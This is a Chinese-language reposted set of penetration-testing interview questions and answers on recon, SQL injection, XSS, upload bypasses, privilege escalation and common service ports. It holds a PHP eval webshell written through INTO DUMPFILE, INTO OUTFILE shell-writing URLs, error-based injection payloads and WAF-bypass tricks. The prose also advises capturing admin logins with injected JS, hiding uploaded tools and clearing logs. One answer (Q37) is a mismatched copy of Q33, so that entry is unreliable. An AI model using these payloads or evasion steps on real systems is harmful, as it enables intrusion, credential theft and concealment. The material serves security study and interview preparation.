3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

渗透面试题

發(fā)布時(shí)間:2024/1/18 编程问答 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 渗透面试题 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

思路流程

信息收集

  • 服務(wù)器的相關(guān)信息(真實(shí)ip,系統(tǒng)類型,版本,開放端口,WAF等)
  • 網(wǎng)站指紋識別(包括,cms,cdn,證書等),dns記錄
  • whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準(zhǔn)備等)
  • 子域名收集,旁站,C段等
  • google hacking針對化搜索,pdf文件,中間件版本,弱口令掃描等
  • 掃描網(wǎng)站目錄結(jié)構(gòu),爆后臺,網(wǎng)站banner,測試文件,備份等敏感文件泄漏等
  • 傳輸協(xié)議,通用漏洞,exp,github源碼等
  • 漏洞挖掘

  • 瀏覽網(wǎng)站,看看網(wǎng)站規(guī)模,功能,特點(diǎn)等
  • 端口,弱口令,目錄等掃描,對響應(yīng)的端口進(jìn)行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等。
  • XSS,SQL注入,上傳,命令注入,CSRF,cookie安全檢測,敏感信息,通信數(shù)據(jù)傳輸,暴力破解,任意文件上傳,越權(quán)訪問,未授權(quán)訪問,目錄遍歷,文件 包含,重放攻擊(短信轟炸),服務(wù)器漏洞檢測,最后使用漏掃工具等
  • 漏洞利用&權(quán)限提升

    • mysql提權(quán),serv-u提權(quán),oracle提權(quán)
    • windows 溢出提權(quán)
    • linux臟牛,內(nèi)核漏洞提權(quán)e

    清除測試數(shù)據(jù)&輸出報(bào)告

    日志、測試數(shù)據(jù)的清理 總結(jié),輸出滲透測試報(bào)告,附修復(fù)方案

    復(fù)測

    驗(yàn)證并發(fā)現(xiàn)是否有新漏洞,輸出報(bào)告,歸檔

    問題

    1.拿到一個(gè)待檢測的站,你覺得應(yīng)該先做什么?

    a、信息收集 1、獲取域名的whois信息,獲取注冊者郵箱姓名電話等,丟社工庫里看看有沒有泄露密碼,然后嘗試用泄露的密碼進(jìn)行登錄后臺。用郵箱做關(guān)鍵詞進(jìn)行丟進(jìn)搜索引擎。利用搜索到的關(guān)聯(lián)信息找出其他郵箱進(jìn)而得到常用社交賬號。社工找出社交賬號,里面或許會找出管理員設(shè)置密碼的習(xí)慣 。利用已有信息生成專用字典。 2、查詢服務(wù)器旁站以及子域名站點(diǎn),因?yàn)橹髡疽话惚容^難,所以先看看旁站有沒有通用性的cms或者其他漏洞。 3、查看服務(wù)器操作系統(tǒng)版本,web中間件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞 4、查看IP,進(jìn)行IP地址端口掃描,對響應(yīng)的端口進(jìn)行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等。 5、掃描網(wǎng)站目錄結(jié)構(gòu),看看是否可以遍歷目錄,或者敏感文件泄漏,比如php探針 6、google hack 進(jìn)一步探測網(wǎng)站的信息,后臺,敏感文件

    b、漏洞掃描 開始檢測漏洞,如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權(quán)訪問,目錄讀取,任意文件讀取,下載,文件包含,遠(yuǎn)程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等

    c、漏洞利用 利用以上的方式拿到webshell,或者其他權(quán)限

    d、權(quán)限提升 提權(quán)服務(wù)器,比如windows下mysql的udf提權(quán),serv-u提權(quán),windows低版本的漏洞,如iis6,pr,巴西烤肉,linux臟牛漏洞,linux內(nèi)核版本漏洞提權(quán),linux下的mysql system提權(quán)以及oracle低權(quán)限提權(quán)

    e、日志清理

    f、總結(jié)報(bào)告及修復(fù)方案

    2.判斷出網(wǎng)站的CMS對滲透有什么意義?

    查找網(wǎng)上已曝光的程序漏洞。

    如果開源,還能下載相對應(yīng)的源碼進(jìn)行代碼審計(jì)。

    3.一個(gè)成熟并且相對安全的CMS,滲透時(shí)掃目錄的意義?

    敏感文件、二級目錄掃描

    站長的誤操作比如:網(wǎng)站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點(diǎn)

    4.常見的網(wǎng)站服務(wù)器容器。

    IIS、Apache、nginx、Lighttpd、Tomcat

    5.mysql注入點(diǎn),用工具對目標(biāo)站直接寫入一句話,需要哪些條件?

    root權(quán)限以及網(wǎng)站的絕對路徑。

    6.目前已知哪些版本的容器有解析漏洞,具體舉例。

    a、IIS 6.0 /xx.asp/xx.jpg "xx.asp"是文件夾名

    b、IIS 7.0/7.5 默認(rèn)Fast-CGI開啟,直接在url中圖片地址后面輸入/1.php,會把正常圖片當(dāng)成php解析

    c、Nginx 版本小于等于0.8.37,利用方法和IIS 7.0/7.5一樣,Fast-CGI關(guān)閉情況下也可利用。空字節(jié)代碼 xxx.jpg.php

    d、Apache 上傳的文件命名為:test.php.x1.x2.x3,Apache是從右往左判斷后綴

    e、lighttpd xx.jpg/xx.php,不全,請小伙伴們在評論處不吝補(bǔ)充,謝謝!

    7.如何手工快速判斷目標(biāo)站是windows還是linux服務(wù)器?

    linux大小寫敏感,windows大小寫不敏感。

    8.為何一個(gè)mysql數(shù)據(jù)庫的站,只有一個(gè)80端口開放?

    更改了端口,沒有掃描出來。

    站庫分離。

    3306端口不對外開放

    9、3389無法連接的幾種情況

    沒開放3389 端口 端口被修改 防護(hù)攔截 處于內(nèi)網(wǎng)(需進(jìn)行端口轉(zhuǎn)發(fā))

    10.如何突破注入時(shí)字符被轉(zhuǎn)義?

    寬字符注入 hex編碼繞過

    11.在某后臺新聞編輯界面看到編輯器,應(yīng)該先做什么?

    查看編輯器的名稱版本,然后搜索公開的漏洞。

    12.拿到一個(gè)webshell發(fā)現(xiàn)網(wǎng)站根目錄下有.htaccess文件,我們能做什么?

    能做的事情很多,用隱藏網(wǎng)馬來舉例子: 插入 <FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php .jpg文件會被解析成.php文件。

    具體其他的事情,不好詳說,建議大家自己去搜索語句來玩玩。

    13.注入漏洞只能查賬號密碼?

    只要權(quán)限廣,拖庫脫到老。

    14.安全狗會追蹤變量,從而發(fā)現(xiàn)出是一句話木馬嗎?

    是根據(jù)特征碼,所以很好繞過了,只要思路寬,繞狗繞到歡,但這應(yīng)該不會是一成不變的。

    **15.access 掃出后綴為asp的數(shù)據(jù)庫文件,訪問亂碼,**如何實(shí)現(xiàn)到本地利用?

    迅雷下載,直接改后綴為.mdb。

    16.提權(quán)時(shí)選擇可讀寫目錄,為何盡量不用帶空格的目錄?

    因?yàn)閑xp執(zhí)行多半需要空格界定參數(shù)

    17.某服務(wù)器有站點(diǎn)A,B 為何在A的后臺添加test用戶,訪問B的后臺。發(fā)現(xiàn)也添加上了test用戶?

    同數(shù)據(jù)庫。

    18.注入時(shí)可以不使用and 或or 或xor,直接order by 開始注入嗎?

    and/or/xor,前面的1=1、1=2步驟只是為了判斷是否為注入點(diǎn),如果已經(jīng)確定是注入點(diǎn)那就可以省那步驟去。

    19:某個(gè)防注入系統(tǒng),在注入時(shí)會提示:

    系統(tǒng)檢測到你有非法注入的行為。 已記錄您的ip xx.xx.xx.xx 時(shí)間:2016:01-23 提交頁面:test.asp?id=15 提交內(nèi)容:and 1=1

    20、如何利用這個(gè)防注入系統(tǒng)拿shell?

    在URL里面直接提交一句話,這樣網(wǎng)站就把你的一句話也記錄進(jìn)數(shù)據(jù)庫文件了 這個(gè)時(shí)候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。

    21.上傳大馬后訪問亂碼時(shí),有哪些解決辦法?

    瀏覽器中改編碼。

    22.審查上傳點(diǎn)的元素有什么意義?

    有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時(shí)只要增加上傳類型就能突破限制了。

    23.目標(biāo)站禁止注冊用戶,找回密碼處隨便輸入用戶名提示:“此用戶不存在”,你覺得這里怎樣利用?

    先爆破用戶名,再利用被爆破出來的用戶名爆破密碼。 其實(shí)有些站點(diǎn),在登陸處也會這樣提示 所有和數(shù)據(jù)庫有交互的地方都有可能有注入。

    24.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為 http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?

    這就是傳說中的下載漏洞!在file=后面嘗試輸入index.php下載他的首頁文件,然后在首頁文件里繼續(xù)查找其他網(wǎng)站的配置文件,可以找出網(wǎng)站的數(shù)據(jù)庫密碼和數(shù)據(jù)庫的地址。

    25.甲給你一個(gè)目標(biāo)站,并且告訴你根目錄下存在/abc/目錄,并且此目錄下存在編輯器和admin目錄。請問你的想法是?

    直接在網(wǎng)站二級目錄/abc/下掃描敏感文件及目錄。

    26.在有shell的情況下,如何使用xss實(shí)現(xiàn)對目標(biāo)站的長久控制?

    后臺登錄處加一段記錄登錄賬號密碼的js,并且判斷是否登錄成功,如果登錄成功,就把賬號密碼記錄到一個(gè)生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中。(此方法適合有價(jià)值并且需要深入控制權(quán)限的網(wǎng)絡(luò))。

    在登錄后才可以訪問的文件中插入XSS腳本。

    27.后臺修改管理員密碼處,原密碼顯示為*。你覺得該怎樣實(shí)現(xiàn)讀出這個(gè)用戶的密碼?

    審查元素 把密碼處的password屬性改成text就明文顯示了

    28.目標(biāo)站無防護(hù),上傳圖片可以正常訪問,上傳腳本格式訪問則403.什么原因?

    原因很多,有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本,嘗試改后綴名繞過

    29.審查元素得知網(wǎng)站所使用的防護(hù)軟件,你覺得怎樣做到的?

    在敏感操作被攔截,通過界面信息無法具體判斷是什么防護(hù)的時(shí)候,F12看HTML體部 比如護(hù)衛(wèi)神就可以在名稱那看到內(nèi)容。

    30.在win2003服務(wù)器中建立一個(gè) .zhongzi文件夾用意何為?

    隱藏文件夾,為了不讓管理員發(fā)現(xiàn)你傳上去的工具。

    31、sql注入有以下兩個(gè)測試選項(xiàng),選一個(gè)并且闡述不選另一個(gè)的理由:

    A. demo.jsp?id=2+1 B. demo.jsp?id=2-1 選B,在 URL 編碼中 + 代表空格,可能會造成混淆

    32、以下鏈接存在 sql 注入漏洞,對于這個(gè)變形注入,你有什么思路?

    demo.do?DATA=AjAxNg== DATA有可能經(jīng)過了 base64 編碼再傳入服務(wù)器,所以我們也要對參數(shù)進(jìn)行 base64 編碼才能正確完成測試

    33、發(fā)現(xiàn) demo.jsp?uid=110 注入點(diǎn),你有哪幾種思路獲取 webshell,哪種是優(yōu)選?

    有寫入權(quán)限的,構(gòu)造聯(lián)合查詢語句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統(tǒng)的文件中,這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同,來直接獲得一個(gè) Shell,這樣效率更高 通過構(gòu)造聯(lián)合查詢語句得到網(wǎng)站管理員的賬戶和密碼,然后掃后臺登錄后臺,再在后臺通過改包上傳等方法上傳 Shell

    34、CSRF 和 XSS 和 XXE 有什么區(qū)別,以及修復(fù)方式?

    XSS是跨站腳本攻擊,用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來執(zhí)行,從而實(shí)現(xiàn)竊取用戶信息等攻擊。修復(fù)方式:對字符實(shí)體進(jìn)行轉(zhuǎn)義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時(shí)校驗(yàn)、瀏覽器與Web應(yīng)用端采用相同的字符編碼。

    CSRF是跨站請求偽造攻擊,XSS是實(shí)現(xiàn)CSRF的諸多手段中的一種,是由于沒有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)。修復(fù)方式:篩選出需要防范CSRF的頁面然后嵌入Token、再次輸入密碼、檢驗(yàn)Referer XXE是XML外部實(shí)體注入攻擊,XML中可以通過調(diào)用實(shí)體來請求本地或者遠(yuǎn)程內(nèi)容,和遠(yuǎn)程文件保護(hù)類似,會引發(fā)相關(guān)安全問題,例如敏感文件讀取。修復(fù)方式:XML解析庫在調(diào)用時(shí)嚴(yán)格禁止對外部實(shí)體的解析。

    35、CSRF、SSRF和重放攻擊有什么區(qū)別?

    CSRF是跨站請求偽造攻擊,由客戶端發(fā)起 SSRF是服務(wù)器端請求偽造,由服務(wù)器發(fā)起 重放攻擊是將截獲的數(shù)據(jù)包進(jìn)行重放,達(dá)到身份認(rèn)證等目的

    36、說出至少三種業(yè)務(wù)邏輯漏洞,以及修復(fù)方式?

    密碼找回漏洞中存在

    1)密碼允許暴力破解、

    2)存在通用型找回憑證、

    3)可以跳過驗(yàn)證步驟、

    4)找回憑證可以攔包獲取

    等方式來通過廠商提供的密碼找回功能來得到密碼。身份認(rèn)證漏洞中最常見的是

    1)會話固定攻擊

    2) Cookie 仿冒

    只要得到 Session 或 Cookie 即可偽造用戶身份。驗(yàn)證碼漏洞中存在

    1)驗(yàn)證碼允許暴力破解

    2)驗(yàn)證碼可以通過 Javascript 或者改包的方法來進(jìn)行繞過

    37、圈出下面會話中可能存在問題的項(xiàng),并標(biāo)注可能會存在的問題?

    get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world” HTTP/1.1Host:***.com:82User-Agent:Mozilla/ 5.0 Firefox/40Accept:text/css,/;q=0.1 Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3 Referer:http://*******.com/eciop/orderForCC/ cgtListForCC.htm?zone=11370601&v=145902 Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d; uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ; st_uid=N90PLYHLZGJXI-NX01VPUF46W; status=True Connection:keep-alive

    有寫入權(quán)限的,構(gòu)造聯(lián)合查詢語句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統(tǒng)的文件中,這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同,來直接獲得一個(gè) Shell,這樣效率更高 通過構(gòu)造聯(lián)合查詢語句得到網(wǎng)站管理員的賬戶和密碼,然后掃后臺登錄后臺,再在后臺通過改包上傳等方法上傳 Shell

    38、給你一個(gè)網(wǎng)站你是如何來滲透測試的?在獲取書面授權(quán)的前提下。

    39、sqlmap,怎么對一個(gè)注入點(diǎn)注入? 1)如果是get型號,直接,sqlmap -u "諸如點(diǎn)網(wǎng)址". 2) 如果是post型諸如點(diǎn),可以sqlmap -u "注入點(diǎn)網(wǎng)址” --data="post的參數(shù)" 3)如果是cookie,X-Forwarded-For等,可以訪問的時(shí)候,用burpsuite抓包,注入處用號替換,放到文件里,然后sqlmap -r "文件地址"

    40、nmap,掃描的幾種方式

    41、sql注入的幾種類型? 1)報(bào)錯(cuò)注入 2)bool型注入 3)延時(shí)注入 4)寬字節(jié)注入 42、報(bào)錯(cuò)注入的函數(shù)有哪些?10個(gè)

    1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】 2)通過floor報(bào)錯(cuò) 向下取整 3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1) 4).geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b)); 5).multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b)); 6).polygon()select from test where id=1 and polygon((select from(select from(select user())a)b)); 7).multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b)); 8).linestring()select from test where id=1 and linestring((select from(select from(select user())a)b)); 9).multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b)); 10).exp()select from test where id=1 and exp(~(select * from(select user())a));

    43、延時(shí)注入如何來判斷?

    if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

    44、盲注和延時(shí)注入的共同點(diǎn)?都是一個(gè)字符一個(gè)字符的判斷

    45、如何拿一個(gè)網(wǎng)站的webshell?上傳,后臺編輯模板,sql注入寫文件,命令執(zhí)行,代碼執(zhí)行, 一些已經(jīng)爆出的cms漏洞,比如dedecms后臺可以直接建立腳本文件,wordpress上傳插件包含腳本文件zip壓縮包等

    46、sql注入寫文件都有哪些函數(shù)?

    select '一句話' into outfile '路徑' select '一句話' into dumpfile '路徑' select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

    47、如何防止CSRF? 1,驗(yàn)證referer 2,驗(yàn)證token 詳細(xì):http://cnodejs.org/topic/5533dd6e9138f09b629674fd

    48、owasp 漏洞都有哪些? 1、SQL注入防護(hù)方法: 2、失效的身份認(rèn)證和會話管理 3、跨站腳本攻擊XSS 4、直接引用不安全的對象 5、安全配置錯(cuò)誤 6、敏感信息泄露 7、缺少功能級的訪問控制 8、跨站請求偽造CSRF 9、使用含有已知漏洞的組件 10、未驗(yàn)證的重定向和轉(zhuǎn)發(fā)

    49、SQL注入防護(hù)方法? 1、使用安全的API 2、對輸入的特殊字符進(jìn)行Escape轉(zhuǎn)義處理 3、使用白名單來規(guī)范化輸入驗(yàn)證方法 4、對客戶端輸入進(jìn)行控制,不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫進(jìn)行SQL查詢之前,對特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。

    50、代碼執(zhí)行,文件讀取,命令執(zhí)行的函數(shù)都有哪些?

    1)代碼執(zhí)行:eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function2)文件讀取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等 3)命令執(zhí)行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

    51、img標(biāo)簽除了onerror屬性外,還有其他獲取管理員路徑的辦法嗎? src指定一個(gè)遠(yuǎn)程的腳本文件,獲取referer

    52、img標(biāo)簽除了onerror屬性外,并且src屬性的后綴名,必須以.jpg結(jié)尾,怎么獲取管理員路徑。

    1)遠(yuǎn)程服務(wù)器修改apache配置文件,配置.jpg文件以php方式來解析 AddType application/x-httpd-php .jpg <img src=http://xss.tv/1.jpg> 會以php方式來解析

    53、為什么aspx木馬權(quán)限比asp大?

    aspx使用的是.net技術(shù)。IIS 中默認(rèn)不支持,ASP只是腳本語言而已。入侵的時(shí)候asp的木馬一般是guest權(quán)限…APSX的木馬一般是users權(quán)限。

    54、如何繞過waf?

    大小寫轉(zhuǎn)換法 干擾字符 /*!*/ 編碼 base64 unicode hex url ascll 復(fù)參數(shù)

    55、如何向服務(wù)器寫入webshell?

    各種上傳漏洞 mysql具有寫入權(quán)限,用sql語句寫入shell http put方法

    56、滲透測試中常見的端口

    a、web類(web漏洞/敏感目錄) 第三方通用組件漏洞struts thinkphp jboss ganglia zabbix

    80 web 80-89 web 8000-9090 web

    b、數(shù)據(jù)庫類(掃描弱口令)

    1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL

    c、特殊服務(wù)類(未授權(quán)/命令執(zhí)行類/漏洞)

    443 SSL心臟滴血 873 Rsync未授權(quán) 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授權(quán) 7001,7002 WebLogic默認(rèn)弱口令,反序列 9200,9300 elasticsearch 參考WooYun: 多玩某服務(wù)器ElasticSearch命令執(zhí)行漏洞 11211 memcache未授權(quán)訪問 27017,27018 Mongodb未授權(quán)訪問 50000 SAP命令執(zhí)行 50070,50030 hadoop默認(rèn)端口未授權(quán)訪問

    d、常用端口類(掃描弱口令/端口爆破)

    21 ftp 22 SSH 23 Telnet 2601,2604 zebra路由,默認(rèn)密碼zebra 3389 遠(yuǎn)程桌面

    ALL、端口合計(jì)詳情

    21 ftp 22 SSH 23 Telnet 80 web 80-89 web 161 SNMP 389 LDAP 443 SSL心臟滴血以及一些web漏洞測試 445 SMB 512,513,514 Rexec 873 Rsync未授權(quán) 1025,111 NFS 1433 MSSQL 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主機(jī)管理系統(tǒng)登陸 (國外用較多) 2222 DA虛擬主機(jī)管理系統(tǒng)登陸 (國外用較多) 2601,2604 zebra路由,默認(rèn)密碼zebra 3128 squid代理默認(rèn)端口,如果沒設(shè)置口令很可能就直接漫游內(nèi)網(wǎng)了 3306 MySQL 3312/3311 kangle主機(jī)管理系統(tǒng)登陸 3389 遠(yuǎn)程桌面 4440 rundeck 參考WooYun: 借用新浪某服務(wù)成功漫游新浪內(nèi)網(wǎng) 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 參考WooYun: Varnish HTTP accelerator CLI 未授權(quán)訪問易導(dǎo)致網(wǎng)站被直接篡改或者作為代理進(jìn)入內(nèi)網(wǎng) 6379 redis未授權(quán) 7001,7002 WebLogic默認(rèn)弱口令,反序列 7778 Kloxo主機(jī)控制面板登錄 8000-9090 都是一些常見的web端口,有些運(yùn)維喜歡把管理后臺開在這些非80的端口上 8080 tomcat/WDCP主機(jī)管理系統(tǒng),默認(rèn)弱口令 8080,8089,9090 JBOSS 8083 Vestacp主機(jī)管理系統(tǒng) (國外用較多) 8649 ganglia 8888 amh/LuManager 主機(jī)管理系統(tǒng)默認(rèn)端口 9200,9300 elasticsearch 參考WooYun: 多玩某服務(wù)器ElasticSearch命令執(zhí)行漏洞 10000 Virtualmin/Webmin 服務(wù)器虛擬主機(jī)管理系統(tǒng) 11211 memcache未授權(quán)訪問 27017,27018 Mongodb未授權(quán)訪問 28017 mongodb統(tǒng)計(jì)頁面 50000 SAP命令執(zhí)行 50070,50030 hadoop默認(rèn)端口未授權(quán)訪問

    深信服一面:

    • 了解哪些漏洞
    • 文件上傳有哪些防護(hù)方式
    • 用什么掃描端口,目錄
    • 如何判斷注入
    • 注入有防護(hù)怎么辦
    • 有沒有寫過tamper
    • 3306 1443 8080是什么端口
    • 計(jì)算機(jī)網(wǎng)絡(luò)從物理層到應(yīng)用層xxxx
    • 有沒有web服務(wù)開發(fā)經(jīng)驗(yàn)
    • 如何向服務(wù)器寫入webshell
    • 有沒有用過xss平臺
    • 網(wǎng)站滲透的流程
    • mysql兩種提權(quán)方式(udf,?)
    • 常見加密方式xxx
    • ddos如何防護(hù)
    • 有沒有抓過包,會不會寫wireshark過濾規(guī)則
    • 清理日志要清理哪些

    SQL注入防護(hù)

    1、使用安全的API 2、對輸入的特殊字符進(jìn)行Escape轉(zhuǎn)義處理 3、使用白名單來規(guī)范化輸入驗(yàn)證方法 4、對客戶端輸入進(jìn)行控制,不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫進(jìn)行SQL查詢之前,對特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。 6、規(guī)范編碼,字符集

    為什么參數(shù)化查詢可以防止sql注入

    原理:

    使用參數(shù)化查詢數(shù)據(jù)庫服務(wù)器不會把參數(shù)的內(nèi)容當(dāng)作sql指令的一部分來執(zhí)行,是在數(shù)據(jù)庫完成sql指令的編譯后才套用參數(shù)運(yùn)行

    簡單的說: 參數(shù)化能防注入的原因在于,語句是語句,參數(shù)是參數(shù),參數(shù)的值并不是語句的一部分,數(shù)據(jù)庫只按語句的語義跑

    SQL頭注入點(diǎn)

    UA REFERER COOKIE IP

    盲注是什么?怎么盲注?

    盲注是在SQL注入攻擊過程中,服務(wù)器關(guān)閉了錯(cuò)誤回顯,我們單純通過服務(wù)器返回內(nèi)容的變化來判斷是否存在SQL注入和利用的方式。盲注的手段有兩種,一個(gè)是通過頁面的返回內(nèi)容是否正確(boolean-based),來驗(yàn)證是否存在注入。一個(gè)是通過sql語句處理時(shí)間的不同來判斷是否存在注入(time-based),在這里,可以用benchmark,sleep等造成延時(shí)效果的函數(shù),也可以通過構(gòu)造大笛卡兒積的聯(lián)合查詢表來達(dá)到延時(shí)的目的。

    寬字節(jié)注入產(chǎn)生原理以及根本原因

    產(chǎn)生原理

    在數(shù)據(jù)庫使用了寬字符集而WEB中沒考慮這個(gè)問題的情況下,在WEB層,由于0XBF27是兩個(gè)字符,在PHP中比如addslash和magic_quotes_gpc開啟時(shí),由于會對0x27單引號進(jìn)行轉(zhuǎn)義,因此0xbf27會變成0xbf5c27,而數(shù)據(jù)進(jìn)入數(shù)據(jù)庫中時(shí),由于0XBF5C是一個(gè)另外的字符,因此\轉(zhuǎn)義符號會被前面的bf帶著"吃掉",單引號由此逃逸出來可以用來閉合語句。

    在哪里編碼

    根本原因

    character_set_client(客戶端的字符集)和character_set_connection(連接層的字符集)不同,或轉(zhuǎn)換函數(shù)如,iconv、mb_convert_encoding使用不當(dāng)。

    解決辦法

    統(tǒng)一數(shù)據(jù)庫、Web應(yīng)用、操作系統(tǒng)所使用的字符集,避免解析產(chǎn)生差異,最好都設(shè)置為UTF-8。或?qū)?shù)據(jù)進(jìn)行正確的轉(zhuǎn)義,如mysql_real_escape_string+mysql_set_charset的使用。

    sql里面只有update怎么利用

    先理解這句 SQL

    UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

    如果此 SQL 被修改成以下形式,就實(shí)現(xiàn)了注入

    a、修改 homepage 值為http://xxx.net', userlevel='3

    之后 SQL 語句變?yōu)?/p> UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

    userlevel 為用戶級別

    b、修改 password 值為mypass)' WHERE username='admin'#

    之后 SQL 語句變?yōu)?/p> UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

    c、修改 id 值為' OR username='admin'之后 SQL 語句變?yōu)?/p> UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

    sql如何寫shell/單引號被過濾怎么辦

    寫shell: root權(quán)限,GPC關(guān)閉,知道文件路徑 outfile函數(shù)

    `http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'``http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'`

    寬字節(jié)注入

    代替空格的方法

    %0a、%0b、%a0 等 /**/ 等注釋符 <>

    mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別?

    5.0以下沒有information_schema這個(gè)系統(tǒng)表,無法列表名等,只能暴力跑表名。

    5.0以下是多用戶單操作,5.0以上是多用戶多操做。

    XSS

    XSS原理

    反射型

    用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來執(zhí)行,從而實(shí)現(xiàn)竊取用戶信息等攻擊。需要誘使用戶“點(diǎn)擊”一個(gè)惡意鏈接,才能攻擊成功

    儲存型

    存儲型XSS會把用戶輸入的數(shù)據(jù)“存儲”在服務(wù)器端。這種XSS具有很強(qiáng)的穩(wěn)定性。

    DOM型

    通過修改頁面的DOM節(jié)點(diǎn)形成的XSS,稱之為DOM Based XSS。

    DOM型和反射型的區(qū)別

    反射型XSS:通過誘導(dǎo)用戶點(diǎn)擊,我們構(gòu)造好的惡意payload才會觸發(fā)的XSS。反射型XSS的檢測我們在每次請求帶payload的鏈接時(shí)頁面應(yīng)該是會帶有特定的畸形數(shù)據(jù)的。DOM型:通過修改頁面的DOM節(jié)點(diǎn)形成的XSS。DOM-based XSS由于是通過js代碼進(jìn)行dom操作產(chǎn)生的XSS,所以在請求的響應(yīng)中我們甚至不一定會得到相應(yīng)的畸形數(shù)據(jù)。根本區(qū)別在我看來是輸出點(diǎn)的不同。

    DOM型XSS 自動(dòng)化測試或人工測試

    人工測試思路:找到類似document.write、innerHTML賦值、outterHTML賦值、window.location操作、寫javascript:后內(nèi)容、eval、setTimeout 、setInterval 等直接執(zhí)行之類的函數(shù)點(diǎn)。找到其變量,回溯變量來源觀察是否可控,是否經(jīng)過安全函數(shù)。自動(dòng)化測試參看道哥的博客,思路是從輸入入手,觀察變量傳遞的過程,最終檢查是否有在危險(xiǎn)函數(shù)輸出,中途是否有經(jīng)過安全函數(shù)。但是這樣就需要有一個(gè)javascript解析器,否則會漏掉一些通過js執(zhí)行帶入的部分內(nèi)容。

    在回答這段問題的時(shí)候,由于平時(shí)對客戶的檢測中,基本是憑借不同功能點(diǎn)的功能加上經(jīng)驗(yàn)和直覺來進(jìn)行檢測,對不同類型的XSS檢測方式實(shí)際上并沒有太過細(xì)分的標(biāo)準(zhǔn)化檢測方式,所以回答的很爛。。。

    對于XSS怎么修補(bǔ)建議

    輸入點(diǎn)檢查:對用戶輸入的數(shù)據(jù)進(jìn)行合法性檢查,使用filter過濾敏感字符或?qū)M(jìn)行編碼轉(zhuǎn)義,針對特定類型數(shù)據(jù)進(jìn)行格式檢查。針對輸入點(diǎn)的檢查最好放在服務(wù)器端實(shí)現(xiàn)。

    輸出點(diǎn)檢查:對變量輸出到HTML頁面中時(shí),對輸出內(nèi)容進(jìn)行編碼轉(zhuǎn)義,輸出在HTML中時(shí),對其進(jìn)行HTMLEncode,如果輸出在Javascript腳本中時(shí),對其進(jìn)行JavascriptEncode。對使用JavascriptEncode的變量都放在引號中并轉(zhuǎn)義危險(xiǎn)字符,data部分就無法逃逸出引號外成為code的一部分。還可以使用更加嚴(yán)格的方法,對所有數(shù)字字母之外的字符都使用十六進(jìn)制編碼。此外,要注意在瀏覽器中,HTML的解析會優(yōu)先于Javascript的解析,編碼的方式也需要考慮清楚,針對不同的輸出點(diǎn),我們防御XSS的方法可能會不同,這點(diǎn)可能在之后的文章會做下總結(jié)。

    除此之外,還有做HTTPOnly對Cookie劫持做限制。

    XSS蠕蟲的產(chǎn)生條件

